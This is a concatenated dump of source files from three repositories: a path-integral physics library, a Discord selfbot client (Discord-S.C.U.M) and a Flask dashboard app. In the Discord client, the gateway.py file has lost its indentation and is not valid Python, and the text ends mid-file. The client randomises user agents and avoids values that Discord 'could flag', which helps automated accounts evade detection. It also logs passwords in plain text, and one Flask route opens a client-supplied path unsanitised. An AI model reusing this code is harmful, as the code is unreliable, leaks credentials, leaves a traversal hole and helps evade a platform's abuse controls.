            # Explicitly normalize at each step for stability.
            temp_wf1 = temp_wf2 / np.sqrt(np.sum(temp_wf2 ** 2))
            temp_wf2 = np.zeros_like(temp_wf1)

        return temp_wf1

    @property
    @cached
    def ground_wf(self) -> '[1]':
        """
        Normalized ground state wavefunction.
        """
        return self._propagate_trial(self.trial_f_grid, self.num_links // 2)

    @property
    def density(self):
        # Never materialized in the implicit implementation.
        raise NotImplementedError()

    @property
    @cached
    def energy_mixed(self) -> 'kJ/mol':
        """
        Ground state energy calculated using the mixed estimator.
        """
        # Propagate the (already half-propagated) ground_wf the rest of the way.
        ground_wf_full = self._propagate_trial(self.ground_wf, self.num_links // 2)  # [1]
        trial_f_diffs = np.sum(self.trial_f_diffs_grid / self.masses[:, np.newaxis], axis=0)  # [mol/g nm^2]
        energy_V = np.sum(ground_wf_full * self.pot_f_grid * self.trial_f_grid)  # kJ/mol
        energy_K = np.dot(ground_wf_full, trial_f_diffs)  # mol/g nm^2
        normalization = np.dot(ground_wf_full, self.trial_f_grid)  # 1
        return (energy_V - 0.5 * HBAR * HBAR * energy_K) / normalization
--- FILE SEPARATOR ---
"""
Convenience functions for plotting the generated data.
"""
import matplotlib.pyplot as plt
def plot2d(data: '[[X]]', x_range, y_range, out_path, *, x_label=None, y_label=None, colormap='jet', colorbar=True):
    """
    Draw the data as a heat map and write the image to a file.

    Parameters:
        data: Two-dimensional array of numbers to plot.
        x_range: Tuple containing the min and max values for the x axis.
        y_range: Tuple containing the min and max values for the y axis.
        out_path: The path to the file where the image should be written. The
            extension determines the image format (e.g. pdf, png).
        x_label: Label for the x axis.
        y_label: Label for the y axis.
        colormap: matplotlib colormap to use for the image.
        colorbar: Whether to display the colorbar.
    """
    figure = plt.figure()
    axes = figure.gca()

    # imshow expects the extent as (left, right, bottom, top).
    extent = x_range + y_range
    image = axes.imshow(data, cmap=colormap, origin='lower', extent=extent)

    for label, setter in ((x_label, axes.set_xlabel), (y_label, axes.set_ylabel)):
        if label is not None:
            setter(label)

    if colorbar:
        figure.colorbar(image, drawedges=False)

    figure.savefig(out_path, bbox_inches='tight', transparent=True)
--- FILE SEPARATOR ---
"""
Example potential functions.
"""
import numpy as np
def free_particle_potential() -> 'nm -> kJ/mol':
    """
    Build the potential function for a free (non-interacting) particle.
    """
    def free_particle(q: 'nm') -> 'kJ/mol':
        """Return zero potential for every configuration in q."""
        # Collapse the trailing coordinate axis: one value per grid point.
        trimmed_shape = q.shape[:-1]
        return np.zeros(trimmed_shape)

    return free_particle
def harmonic_potential(k: 'kJ/mol nm^2' = None, m: 'g/mol' = None, w: '1/ps' = None) -> 'nm -> kJ/mol':
    """
    Harmonic potential relative to the origin.

    Note:
        Either k or (m and w) must be specified.

    Parameters:
        k: Spring constant.
        m: Mass of particle.
        w: Angular frequency of oscillator.

    Raises:
        ValueError: If neither k nor both m and w are provided.
    """
    if k is not None:
        force_constant = k  # kJ/mol nm^2
    elif m is not None and w is not None:
        force_constant = m * w * w  # kJ/mol nm^2
    else:
        # Raise a real exception instead of `assert False`: asserts are
        # stripped when Python runs with optimizations enabled (-O), which
        # would have let an UnboundLocalError surface later instead.
        raise ValueError('Must provide either k or (m and w).')

    def harmonic(q: 'nm') -> 'kJ/mol':
        # Only the first (innermost) coordinate of each configuration is used;
        # callers pass single-coordinate slices like qs[..., [0]].
        return force_constant * q[..., 0] * q[..., 0] / 2

    return harmonic
--- FILE SEPARATOR ---
"""
Assorted tools.
"""
from functools import wraps
def cached(f):
    """
    Memoize a constant instance method on its instance.

    The instance must provide a ``_cached`` dict; the wrapped function object
    itself is used as the key, so each decorated method gets its own slot.
    """
    @wraps(f)
    def wrapped(self, *args, **kwargs):
        cache = self._cached
        try:
            return cache[f]
        except KeyError:
            value = f(self, *args, **kwargs)
            cache[f] = value
            return value

    return wrapped
|
[
"/examples/pift_harmonic_oscillator.py",
"/examples/pigs_harmonic_oscillator.py",
"/examples/pigs_harmonic_oscillator_entangled.py",
"/pathintmatmult/__init__.py",
"/pathintmatmult/nmm.py",
"/pathintmatmult/plotting.py",
"/pathintmatmult/potentials.py",
"/pathintmatmult/tools.py"
] |
00-00-00-11/Discord-S.C.U.M
|
import inspect
class LogLevel:
    # ANSI terminal escape codes used to colorize console log output.
    INFO = '\033[94m'     # blue
    OK = '\033[92m'       # green
    WARNING = '\033[93m'  # yellow
    DEFAULT = '\033[m'    # reset to the terminal's default color
class Logger:
    """
    Console logger that colorizes output and tags each message with the
    calling object's class and method, discovered via the call stack.
    """

    @staticmethod
    def LogMessage(msg, hex_data='', to_file=False, to_console=True, log_level=LogLevel.INFO): #to_file was acting a bit buggy so I decided to remove it altogether for now
        stack = inspect.stack()
        # NOTE(review): assumes the caller is a bound method — the calling
        # frame must have a 'self' local, otherwise this raises KeyError.
        function_name = "({}->{})".format(str(stack[1][0].f_locals['self']).split(' ')[0], stack[1][3])
        if to_console is True:
            if hex_data != '':
                # Bug fix: str.encode('hex') is Python 2 only and raises
                # LookupError on Python 3; format each character's code point
                # as two hex digits instead (assumes hex_data is a str —
                # TODO confirm callers never pass bytes).
                print('{} {}'.format(log_level, " ".join('{:02x}'.format(ord(h)) for h in hex_data)))
            else:
                print('{} [+] {} {}'.format(log_level, function_name, msg))
            print(LogLevel.DEFAULT)  # restore console color
--- FILE SEPARATOR ---
from .discum import *
from .gateway.gateway import *
from .Logger import *
from .login.Login import *
--- FILE SEPARATOR ---
from .guild.guild import Guild
from .messages.messages import Messages
from .messages.embed import Embedder
from .user.user import User
from .login.Login import *
from .gateway.gateway import *
import time
import random
import re
import user_agents
class SessionSettingsError(Exception):
    """Raised when the gateway session settings are missing or malformed."""
class Client:
    """
    High-level Discord selfbot client.

    Authenticates (via a token, or email/password through Login), builds a
    requests session with browser-like headers, fetches Discord's current
    build number, and exposes thin wrapper methods around the Messages, User,
    and Guild API helpers plus a GatewayServer for the websocket gateway.
    """

    def __init__(self, email="none", password="none", token="none", proxy_host=None, proxy_port=None, user_agent="random", log=True): #not using None on email, pass, and token since that could get flagged by discord...
        self.log = log
        self.__user_token = token
        self.__user_email = email
        self.__user_password = password
        self.__proxy_host = None if proxy_host in (None,False) else proxy_host
        # Bug fix: this line previously read proxy_host (twice), so the port
        # was silently set to the host value and proxied requests broke.
        self.__proxy_port = None if proxy_port in (None,False) else proxy_port
        self.session_settings = [] #consists of 2 parts, READY and READY_SUPPLEMENTAL
        self.discord = 'https://discord.com/api/v8/'
        self.websocketurl = 'wss://gateway.discord.gg/?encoding=json&v=8'
        if user_agent != "random":
            self.__user_agent = user_agent
        else:
            from random_user_agent.user_agent import UserAgent #only really want to import this if needed...which is why it's down here
            self.__user_agent = UserAgent(limit=100).get_random_user_agent()
            if self.log: print('Randomly generated user agent: '+self.__user_agent)
        parseduseragent = user_agents.parse(self.__user_agent)
        self.ua_data = {'os':parseduseragent.os.family,'browser':parseduseragent.browser.family,'device':parseduseragent.device.family if parseduseragent.is_mobile else '','browser_user_agent':self.__user_agent,'browser_version':parseduseragent.browser.version_string,'os_version':parseduseragent.os.version_string}
        if self.__user_token in ("none",None,False): #assuming email and pass are given...
            self.__login = Login(self.discord,self.__user_email,self.__user_password,self.__user_agent,self.__proxy_host,self.__proxy_port,self.log)
            self.__user_token = self.__login.GetToken() #update token from "none" to true string value
            time.sleep(1)
        self.headers = {
            "Host": "discord.com",
            "User-Agent": self.__user_agent,
            "Accept": "*/*",
            "Accept-Language": "en-US",
            "Authorization": self.__user_token,
            "Connection": "keep-alive",
            "keep-alive" : "timeout=10, max=1000",
            "TE": "Trailers",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache",
            "Referer": "https://discord.com/channels/@me",
            "Content-Type": "application/json"
        }
        self.s = requests.Session()
        self.s.headers.update(self.headers)
        if self.__proxy_host != None: #self.s.proxies defaults to {}
            self.proxies = {
                'http': self.__proxy_host+':'+self.__proxy_port,
                'https': self.__proxy_host+':'+self.__proxy_port
            }
            # Bug fix: previously updated with the bare name `proxies`, which
            # is undefined here and raised NameError whenever a proxy was set.
            self.s.proxies.update(self.proxies)
        if self.log: print("Retrieving Discord's build number...")
        discord_login_page_exploration = self.s.get('https://discord.com/login').text
        time.sleep(1)
        try: #getting the build num is kinda experimental since who knows if discord will change where the build number is located...
            file_with_build_num = 'https://discord.com/assets/'+re.compile(r'assets/+([a-z0-9]+)\.js').findall(discord_login_page_exploration)[-2]+'.js' #fastest solution I could find since the last js file is huge in comparison to 2nd from last
            req_file_build = self.s.get(file_with_build_num).text
            index_of_build_num = req_file_build.find('buildNumber')+14
            self.discord_build_num = int(req_file_build[index_of_build_num:index_of_build_num+5])
            self.ua_data['build_num'] = self.discord_build_num #putting this onto ua_data since getting the build num won't necessarily work
            if self.log: print('Discord is currently on build number '+str(self.discord_build_num))
        except Exception: # narrowed from a bare except so KeyboardInterrupt/SystemExit still propagate
            if self.log: print('Could not retrieve discord build number.')
        self.gateway = GatewayServer(self.websocketurl, self.__user_token, self.ua_data, self.__proxy_host, self.__proxy_port, self.log)

    '''
    test connection (this function was originally in discum and was created by Merubokkusu)
    '''
    def connectionTest(self): #,proxy):
        url=self.discord+'users/@me/affinities/users'
        connection = self.s.get(url)
        if(connection.status_code == 200):
            if self.log: print("Connected")
        else:
            if self.log: print("Incorrect Token")
        return connection

    '''
    discord snowflake to unix timestamp and back
    '''
    def snowflake_to_unixts(self,snowflake):
        return int((snowflake/4194304+1420070400000)/1000)

    def unixts_to_snowflake(self,unixts):
        return int((unixts*1000-1420070400000)*4194304)

    '''
    Messages
    '''
    #create DM
    def createDM(self,recipients):
        return Messages(self.discord,self.s,self.log).createDM(recipients)

    #get recent messages
    def getMessages(self,channelID,num=1,beforeDate=None,aroundMessage=None): # num <= 100, beforeDate is a snowflake
        return Messages(self.discord,self.s,self.log).getMessages(channelID,num,beforeDate,aroundMessage)

    #send text or embed messages
    def sendMessage(self,channelID,message,embed="",tts=False):
        return Messages(self.discord,self.s,self.log).sendMessage(channelID,message,embed,tts)

    #send files (local or link)
    def sendFile(self,channelID,filelocation,isurl=False,message=""):
        return Messages(self.discord,self.s,self.log).sendFile(channelID,filelocation,isurl,message)

    #search messages
    def searchMessages(self,guildID,channelID=None,userID=None,mentionsUserID=None,has=None,beforeDate=None,afterDate=None,textSearch=None,afterNumResults=None):
        return Messages(self.discord,self.s,self.log).searchMessages(guildID,channelID,userID,mentionsUserID,has,beforeDate,afterDate,textSearch,afterNumResults)

    #filter searchMessages, takes in the output of searchMessages (a requests response object) and outputs a list of target messages
    def filterSearchResults(self,searchResponse):
        return Messages(self.discord,self.s,self.log).filterSearchResults(searchResponse)

    #sends the typing action for 10 seconds (or technically until you change the page)
    def typingAction(self,channelID):
        return Messages(self.discord,self.s,self.log).typingAction(channelID)

    #delete message
    def deleteMessage(self,channelID,messageID):
        return Messages(self.discord,self.s,self.log).deleteMessage(channelID,messageID)

    #edit message
    def editMessage(self,channelID,messageID,newMessage):
        return Messages(self.discord,self.s,self.log).editMessage(channelID, messageID, newMessage)

    #pin message
    def pinMessage(self,channelID,messageID):
        return Messages(self.discord,self.s,self.log).pinMessage(channelID,messageID)

    #un-pin message
    def unPinMessage(self,channelID,messageID):
        return Messages(self.discord,self.s,self.log).unPinMessage(channelID,messageID)

    #get pinned messages
    def getPins(self,channelID):
        return Messages(self.discord,self.s,self.log).getPins(channelID)

    #add reaction
    def addReaction(self,channelID,messageID,emoji):
        return Messages(self.discord,self.s,self.log).addReaction(channelID,messageID,emoji)

    #remove reaction
    def removeReaction(self,channelID,messageID,emoji):
        return Messages(self.discord,self.s,self.log).removeReaction(channelID,messageID,emoji)

    #acknowledge message (mark message read)
    def ackMessage(self,channelID,messageID,ackToken=None):
        return Messages(self.discord,self.s,self.log).ackMessage(channelID,messageID,ackToken)

    #unacknowledge message (mark message unread)
    def unAckMessage(self,channelID,messageID,numMentions=0):
        return Messages(self.discord,self.s,self.log).unAckMessage(channelID,messageID,numMentions)

    '''
    User relationships
    '''
    #create outgoing friend request
    def requestFriend(self,user): #you can input a userID(snowflake) or a user discriminator
        return User(self.discord,self.s,self.log).requestFriend(user)

    #accept incoming friend request
    def acceptFriend(self,userID):
        return User(self.discord,self.s,self.log).acceptFriend(userID)

    #remove friend OR unblock user
    def removeRelationship(self,userID):
        return User(self.discord,self.s,self.log).removeRelationship(userID)

    #block user
    def blockUser(self,userID):
        return User(self.discord,self.s,self.log).blockUser(userID)

    '''
    Profile edits
    '''
    # change name
    def changeName(self,name):
        # Bug fix: self.email/self.password never existed on this class; use
        # the stored (name-mangled) credentials instead.
        return User(self.discord,self.s,self.log).changeName(self.__user_email,self.__user_password,name)

    # set status
    def setStatus(self,status):
        return User(self.discord,self.s,self.log).setStatus(status)

    # set avatar
    def setAvatar(self,imagePath):
        # Bug fix: same credential-attribute fix as changeName.
        return User(self.discord,self.s,self.log).setAvatar(self.__user_email,self.__user_password,imagePath)

    '''
    Guild/Server stuff
    '''
    #get guild info from invite code
    def getInfoFromInviteCode(self,inviteCode):
        return Guild(self.discord,self.s,self.log).getInfoFromInviteCode(inviteCode)

    #join guild with invite code
    def joinGuild(self,inviteCode):
        return Guild(self.discord,self.s,self.log).joinGuild(inviteCode)

    #kick a user
    def kick(self,guildID,userID,reason=""):
        return Guild(self.discord,self.s,self.log).kick(guildID,userID,reason)

    #ban a user
    def ban(self,guildID,userID,deleteMessagesDays=0,reason=""):
        return Guild(self.discord,self.s,self.log).ban(guildID,userID,deleteMessagesDays,reason)

    #look up a user in a guild
    def getGuildMember(self,guildID,userID):
        return Guild(self.discord,self.s,self.log).getGuildMember(guildID,userID)
--- FILE SEPARATOR ---
from .gateway import *
from .sessionsettings import *
--- FILE SEPARATOR ---
import websocket
import json
import time
import random
import base64
if __import__('sys').version.split(' ')[0] < '3.0.0':
import thread
else:
import _thread as thread
from .sessionsettings import SessionSettings
class GatewayServer:
class LogLevel:
SEND = '\033[94m'
RECEIVE = '\033[92m'
WARNING = '\033[93m'
DEFAULT = '\033[m'
class OPCODE: #https://discordapp.com/developers/docs/topics/opcodes-and-status-codes
# Name Code Client Action Description
DISPATCH = 0 # Receive dispatches an event
HEARTBEAT = 1 # Send/Receive used for ping checking
IDENTIFY = 2 # Send used for client handshake
STATUS_UPDATE = 3 # Send used to update the client status
VOICE_UPDATE = 4 # Send used to join/move/leave voice channels
# 5 # ??? ???
RESUME = 6 # Send used to resume a closed connection
RECONNECT = 7 # Receive used to tell clients to reconnect to the gateway
REQUEST_GUILD_MEMBERS = 8 # Send used to request guild members
INVALID_SESSION = 9 # Receive used to notify client they have an invalid session id
HELLO = 10 # Receive sent immediately after connecting, contains heartbeat and server debug information
HEARTBEAT_ACK = 11 # Sent immediately following a client heartbeat that was received
GUILD_SYNC = 12 #
def __init__(self, websocketurl, token, ua_data, proxy_host=None, proxy_port=None, log=True):
self.token = token
self.ua_data = ua_data
self.auth = {
"token": self.token,
"capabilities": 61,
"properties": {
"os": self.ua_data["os"],
"browser": self.ua_data["browser"],
"device": self.ua_data["device"],
"browser_user_agent": self.ua_data["browser_user_agent"],
"browser_version": self.ua_data["browser_version"],
"os_version": self.ua_data["os_version"],
"referrer": "",
"referring_domain": "",
"referrer_current": "",
"referring_domain_current": "",
"release_channel": "stable",
"client_build_number": 71420,
"client_event_source": None
},
"presence": {
"status": "online",
"since": 0,
"activities": [],
"afk": False
},
"compress": False,
"client_state": {
"guild_hashes": {},
"highest_last_message_id": "0",
"read_state_version": 0,
"user_guild_settings_version": -1
}
}
if 'build_num' in self.ua_data and self.ua_data['build_num']!=71420:
self.auth['properties']['client_build_number'] = self.ua_data['build_num']
self.proxy_host = None if proxy_host in (None,False) else proxy_host
self.proxy_port = None if proxy_port in (None,False) else proxy_port
self.log = log
self.interval = None
self.session_id = None
self.sequence = 0
self.READY = False #becomes True once READY_SUPPLEMENTAL is received
self.settings_ready = {}
self.settings_ready_supp = {}
#websocket.enableTrace(True)
self.ws = self._get_ws_app(websocketurl)
self._after_message_hooks = []
self._last_err = None
self.connected = False
self.resumable = False
self.voice_data = {} #voice connections dependent on current (connected) session
#WebSocketApp, more info here: https://github.com/websocket-client/websocket-client/blob/master/websocket/_app.py#L79
def _get_ws_app(self, websocketurl):
sec_websocket_key = base64.b64encode(bytes(random.getrandbits(8) for _ in range(16))).decode() #https://websockets.readthedocs.io/en/stable/_modules/websockets/handshake.html
headers = {
"Host": "gateway.discord.gg",
"Connection": "Upgrade",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": self.ua_data["browser_user_agent"],
"Upgrade": "websocket",
"Origin": "https://discord.com",
"Sec-WebSocket-Version": "13",
"Accept-Language": "en-US",
"Sec-WebSocket-Key": sec_websocket_key
} #more info: https://stackoverflow.com/a/40675547
ws = websocket.WebSocketApp(websocketurl,
header = headers,
on_open=lambda ws: self.on_open(ws),
on_message=lambda ws, msg: self.on_message(ws, msg),
on_error=lambda ws, msg: self.on_error(ws, msg),
on_close=lambda ws: self.on_close(ws)
)
return ws
def on_open(self, ws):
self.connected = True
if self.log: print("Connected to websocket.")
if not self.resumable:
self.send({"op": self.OPCODE.IDENTIFY, "d": self.auth})
else:
self.resumable = False
self.send({"op": self.OPCODE.RESUME, "d": {"token": self.token, "session_id": self.session_id, "seq": self.sequence-1 if self.sequence>0 else self.sequence}})
def on_message(self, ws, message):
self.sequence += 1
resp = json.loads(message)
if self.log: print('%s< %s%s' % (self.LogLevel.RECEIVE, resp, self.LogLevel.DEFAULT))
if resp['op'] == self.OPCODE.HELLO: #only happens once, first message sent to client
self.interval = (resp["d"]["heartbeat_interval"]-2000)/1000
thread.start_new_thread(self._heartbeat, ())
elif resp['op'] == self.OPCODE.INVALID_SESSION:
if self.log: print("Invalid session.")
if self.resumable:
self.resumable = False
self.sequence = 0
self.close()
else:
self.sequence = 0
self.close()
if self.interval == None:
if self.log: print("Identify failed.")
self.close()
if resp['t'] == "READY":
self.session_id = resp['d']['session_id']
self.settings_ready = resp['d']
elif resp['t'] == "READY_SUPPLEMENTAL":
self.resumable = True #completely successful identify
self.settings_ready_supp = resp['d']
self.SessionSettings = SessionSettings(self.settings_ready, self.settings_ready_supp)
self.READY = True
elif resp['t'] in ("VOICE_SERVER_UPDATE", "VOICE_STATE_UPDATE"):
self.voice_data.update(resp['d']) #called twice, resulting in a dictionary with 12 keys
thread.start_new_thread(self._response_loop, (resp,))
def on_error(self, ws, error):
if self.log: print('%s%s%s' % (self.LogLevel.WARNING, error, self.LogLevel.DEFAULT))
self._last_err = error
def on_close(self, ws):
self.connected = False
self.READY = False #reset self.READY
if self.log: print('websocket closed')
#Discord needs heartbeats, or else connection will sever
def _heartbeat(self):
if self.log: print("entering heartbeat")
while self.connected:
time.sleep(self.interval)
if not self.connected:
break
self.send({"op": self.OPCODE.HEARTBEAT,"d": self.sequence-1 if self.sequence>0 else self.sequence})
#just a wrapper for ws.send
def send(self, payload):
if self.log: print('%s> %s%s' % (self.LogLevel.SEND, payload, self.LogLevel.DEFAULT))
self.ws.send(json.dumps(payload))
def close(self):
self.connected = False
self.READY = False #reset self.READY
if self.log: print('websocket closed') #sometimes this message will print twice. Don't worry, that's not an error.
self.ws.close()
#the next 2 functions come from https://github.com/scrubjay55/Reddit_ChatBot_Python/blob/master/Reddit_ChatBot_Python/Utils/WebSockClient.py (Apache License 2.0)
def command(self, func):
self._after_message_hooks.append(func)
return func
def _response_loop(self, resp):
for func in self._after_message_hooks:
if func(resp):
break
def removeCommand(self, func):
try:
self._after_message_hooks.remove(func)
except ValueError:
if self.log: print('%s not found in _after_message_hooks.' % func)
pass
def clearCommands(self):
self._after_message_hooks = []
def resetSession(self):
    """Clear all client-side session state (never call while run() is active)."""
    self.READY = False          # flips back to True after READY_SUPPLEMENTAL
    self.resumable = False      # no resume without a session_id and sequence
    self.session_id = None
    self.sequence = 0
    self.interval = None
    self.settings_ready = {}
    self.settings_ready_supp = {}
    self.voice_data = {}
    self._last_err = None
#modified version of function run_4ever from https://github.com/scrubjay55/Reddit_ChatBot_Python/blob/master/Reddit_ChatBot_Python/Utils/WebSockClient.py (Apache License 2.0)
def run(self, auto_reconnect=True):
    """Drive the websocket, reconnecting on network drops.

    With auto_reconnect: address/timeout errors trigger a retry (short
    randomized wait when the session is resumable, 10s otherwise); a
    non-resumable drop (e.g. INVALID_SESSION after IDENTIFY) also retries
    after 10s; any other exit of a resumable session is treated as a clean
    stop and returns 0. Without auto_reconnect, runs the socket once.
    """
    while auto_reconnect:
        # blocks until the socket drops or is closed
        self.ws.run_forever(ping_interval=10, ping_timeout=5, http_proxy_host=self.proxy_host, http_proxy_port=self.proxy_port)
        if isinstance(self._last_err, websocket._exceptions.WebSocketAddressException) or isinstance(self._last_err, websocket._exceptions.WebSocketTimeoutException):
            if self.resumable:
                # jittered 1-5s backoff before attempting a RESUME
                waitTime = random.randrange(1,6)
                if self.log: print("Connection Dropped. Attempting to resume last valid session in %s seconds." % waitTime)
                time.sleep(waitTime)
            else:
                if self.log: print("Connection Dropped. Retrying in 10 seconds.")
                time.sleep(10)
            continue
        elif not self.resumable: #this happens if you send an IDENTIFY but discord says INVALID_SESSION in response
            if self.log: print("Connection Dropped. Retrying in 10 seconds.")
            time.sleep(10)
            continue
        else:
            # clean close of a resumable session: stop looping
            self.resumable = True
            return 0
    if not auto_reconnect:
        self.ws.run_forever(ping_interval=10, ping_timeout=5, http_proxy_host=self.proxy_host, http_proxy_port=self.proxy_port)
--- FILE SEPARATOR ---
from ..Logger import *
import requests
#import requests[socks] #youll need to pip install requests[socks] (this is only if youre using socks)
import json
class Login:
    '''
    Manages HTTP authentication against <discordurlstart>auth/login.

    Fix: the auth payload used to be built with str.format into a JSON
    template, which produced invalid JSON (or injected fields) whenever the
    email/password contained quotes or backslashes. json.dumps now builds
    an equivalent, correctly-escaped body.
    '''
    def __init__(self, discordurlstart, user_email, user_password,user_agent,proxy_host,proxy_port,log):
        self.log = log
        self.URL = discordurlstart + "auth/login"
        self.__user_email = user_email
        self.__user_password = user_password
        self.__user_agent = user_agent
        self.__proxy_host = proxy_host
        self.__proxy_port = proxy_port
        self.__token = None   # cached auth token, filled by Connect()

    def Connect(self):
        """POST the credentials and cache the returned auth token."""
        session = requests.Session()
        if self.__proxy_host not in (None, False):
            # proxy_host/proxy_port are expected to be strings here
            proxy_url = self.__proxy_host + ':' + self.__proxy_port
            session.proxies.update({'http': proxy_url, 'https': proxy_url})
        session.headers.update({"User-Agent": self.__user_agent})
        session.headers.update({'X-Super-Properties': ''})
        session.headers.update({"Content-Type": "application/json"})
        http_auth_data = json.dumps({
            "email": self.__user_email,
            "password": self.__user_password,
            "undelete": False,
            "captcha_key": None,
            "login_source": None,
            "gift_code_sku_id": None,
        })
        if self.log: Logger.LogMessage('Post -> {}'.format(self.URL))
        if self.log: Logger.LogMessage('{}'.format(http_auth_data))
        response = session.post(self.URL, data=http_auth_data)
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        self.__token = json.loads(response.content)['token']

    def GetToken(self):
        """Return the cached token, logging in first if necessary."""
        if self.__token is None:
            self.Connect()
        return self.__token
--- FILE SEPARATOR ---
import requests
import json
import base64
from ..Logger import *
class User(object):
    """REST wrapper for Discord's /users/@me endpoints.

    Covers relationships (friend/block) and profile edits. `discord` is the
    API base URL, `s` an authenticated requests session, `log` toggles
    request/response logging via Logger.
    """
    def __init__(self, discord, s, log): #s is the requests session object
        self.discord = discord
        self.s = s
        self.log = log
    # getDMs/getGuilds/getRelationships were removed: the gateway (websockets)
    # supplies that data now.
    def requestFriend(self,user):
        """Send a friend request; `user` is 'name#discriminator' or a user-id string."""
        if "#" in user:
            url = self.discord+"users/@me/relationships"
            # NOTE(review): int() raises ValueError on a malformed discriminator
            body = {"username": user.split("#")[0], "discriminator": int(user.split("#")[1])}
            if self.log: Logger.LogMessage('Post -> {}'.format(url))
            if self.log: Logger.LogMessage('{}'.format(str(body)))
            response = self.s.post(url, data=json.dumps(body))
            if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
            return response
        url = self.discord+"users/@me/relationships/"+user
        if self.log: Logger.LogMessage('Put -> {}'.format(url))
        response = self.s.put(url, data=json.dumps({}))
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
    def acceptFriend(self,userID):
        """Accept an incoming friend request from `userID`."""
        url = self.discord+"users/@me/relationships/"+userID
        if self.log: Logger.LogMessage('Put -> {}'.format(url))
        response = self.s.put(url, data=json.dumps({}))
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
    def removeRelationship(self,userID): #for removing friends, unblocking people
        """Delete any relationship with `userID` (unfriend or unblock)."""
        url = self.discord+"users/@me/relationships/"+userID
        if self.log: Logger.LogMessage('Delete -> {}'.format(url))
        response = self.s.delete(url)
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
    def blockUser(self,userID):
        """Block `userID` (relationship type 2)."""
        url = self.discord+"users/@me/relationships/"+userID
        if self.log: Logger.LogMessage('Put -> {}'.format(url))
        if self.log: Logger.LogMessage('{}'.format(str({"type":2})))
        response = self.s.put(url, data=json.dumps({"type":2}))
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
    '''
    Profile Edits
    '''
    def changeName(self,email,password,name):
        """Change the account username (requires email+password re-auth)."""
        url = self.discord+"users/@me"
        if self.log: Logger.LogMessage('Patch -> {}'.format(url))
        if self.log: Logger.LogMessage('{}'.format(str({"username":name,"email":email,"password":password})))
        response = self.s.patch(url, data=json.dumps({"username":name,"email":email,"password":password}))
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
    def setStatus(self,status):
        """Set presence or custom status.

        status: 0=online, 1=idle, 2=dnd, 3=invisible, ''=clear custom status,
        any other value is set as custom status text.
        (Refactor: the six copy-pasted request branches now share one body;
        the request/log output per input is unchanged.)
        """
        url = self.discord+"users/@me/settings"
        if self.log: Logger.LogMessage('Patch -> {}'.format(url))
        presences = {0: "online", 1: "idle", 2: "dnd", 3: "invisible"}
        if status in presences:
            body = {"status": presences[status]}
        elif status == '':
            body = {"custom_status": None}
        else:
            body = {"custom_status": {"text": status}}
        if self.log: Logger.LogMessage('{}'.format(str(body)))
        response = self.s.patch(url, data=json.dumps(body))
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
    def setAvatar(self,email,password,imagePath): #local image path
        """Set the avatar from a local image file (sent base64-encoded)."""
        url = self.discord+"users/@me"
        if self.log: Logger.LogMessage('Patch -> {}'.format(url))
        if self.log: Logger.LogMessage('{}'.format(str({"email":email,"password":password,"avatar":"data:image/png;base64,<encoded image data>","discriminator":None,"new_password":None})))
        with open(imagePath, "rb") as image:
            encodedImage = base64.b64encode(image.read()).decode('utf-8')
        response = self.s.patch(url, data=json.dumps({"email":email,"password":password,"avatar":"data:image/png;base64,"+encodedImage,"discriminator":None,"new_password":None}))
        if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
        return response
|
[
"/discum/Logger.py",
"/discum/__init__.py",
"/discum/discum.py",
"/discum/gateway/__init__.py",
"/discum/gateway/gateway.py",
"/discum/login/Login.py",
"/discum/user/user.py"
] |
00-00-00-11/Hummingbird
|
from . import dashboard
from . import home
from . import manage
from . import success
from . import upload
from . import dashboardItem
from . import moreInfoCount
from . import moreInfoGender
from . import moreInfoSalary
from . import moreInfoJobs
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
from lib.dataHandler import *
dashboard = Blueprint('dashboard', __name__, template_folder='templates')

@dashboard.route('/dashboard')
def show():
    """Render the dashboard page with hard-coded demo metrics."""
    return render_template(
        'pages/dashboard.html',
        size=4123,
        mfRatio=51,
        meanTc=251222,
        jobCount=5,
    )
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort, request
from lib.dataHandler import *
dashboardItem = Blueprint('dashboardItem', __name__, template_folder='templates')

@dashboardItem.route('/dashboardItem', methods=['GET','POST'])
def samplefunction():
    """Render the per-dataset dashboard from a previously computed JSON blob.

    POST: request.form['fileSub'] names the blob (no extension) under blobs/.
    GET: renders the page with no data.
    """
    # Fix: json was only in scope via the `from lib.dataHandler import *`
    # star-import side effect; make the dependency explicit.
    import json
    if request.method == 'POST':
        # SECURITY NOTE(review): fileSub comes straight from the client and is
        # used in a file path unsanitized -- '../' would escape blobs/.
        print(request.form['fileSub'])
        with open("blobs/" + request.form['fileSub'] + ".json") as json_file:
            data = json.load(json_file)
        print(data)
        return render_template(
            'pages/dashboardItem.html',
            size=data['count'],
            mfRatio='%.3f' % data['ratio'],
            meanTc=data['meanTc'],
            jobCount=data['jobs'],
            # truncate p-values to three decimal places for display
            p_val_g=int(data['p_val_g'] * 1000) / 1000,
            p_val_race=int(data['p_val_race'] * 1000) / 1000,
            recommendations=data['feedback'],
        )
    return render_template('pages/dashboardItem.html')
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
home = Blueprint('home', __name__, template_folder='templates')

@home.route('/')
def show():
    """Serve the landing page."""
    return render_template('pages/home.html')
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
import os
manage = Blueprint('manage', __name__, template_folder='templates')

@manage.route('/manage')
def show():
    """List uploaded datasets: blob filenames with their 5-char '.json' suffix stripped."""
    names = [blob[:-5] for blob in os.listdir('blobs')]
    return render_template('pages/manage.html', files=names)
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort, request
from lib.dataHandler import *
moreInfoJobs = Blueprint('moreInfoJobs', __name__, template_folder='templates')

@moreInfoJobs.route('/moreInfoJobs', methods=['GET','POST'])
